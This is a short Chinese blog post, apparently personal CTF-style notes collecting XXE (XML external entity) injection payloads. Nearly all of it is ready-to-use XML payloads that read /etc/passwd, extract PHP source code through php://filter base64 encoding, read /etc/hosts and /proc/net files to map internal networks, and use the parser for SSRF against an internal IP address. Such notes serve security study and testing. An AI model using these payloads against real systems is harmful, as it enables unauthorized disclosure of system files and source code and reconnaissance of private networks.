随缘更新~主要记录下遇见的xxe的攻击方法
有回显的XXE
<?xml version="1.0" ?>
<!DOCTYPE a[
<!ENTITY name SYSTEM "file:///etc/passwd">]
>
<user><username>&name;</username><password>1</password></user>
XXE读取源码
<!DOCTYPE foo [<!ELEMENT foo ANY >
<!ENTITY file SYSTEM "php://filter/read=convert.base64-encode/resource=/var/www/html/doLogin.php">
]>
<user><username>&file;</username><password>456</password></user>
使用base64解码后得到源码
利用XXE打内网
利用xxe进行ssrf打内网,扫描一下内网ip的几个文件:/etc/hosts,/proc/net/arp,/proc/net/fib_trie
<?xml version="1.0" ?>
<!DOCTYPE a[
<!ENTITY name SYSTEM "file:///etc/hosts">]
>
<user><username>&name;</username><password>1</password></user>
用http协议访问找到的ip地址
<?xml version="1.0"?>
<!DOCTYPE dy [
<!ENTITY dy SYSTEM "http://10.159.187.11">
]>
<user><username>&dy;</username><password>123</password></user>
也可以使用php://filter读取,可以绕过回显问题
<?xml version="1.0"?>
<!DOCTYPE dy [
<!ENTITY dy SYSTEM "php://filter/read=convert.base64-encode/resource=http://10.159.187.11">
]>
<user><username>&dy;</username><password>123</password></user>
Comments | 2 条评论
这是一条私密评论
@林皓月 这是一条私密评论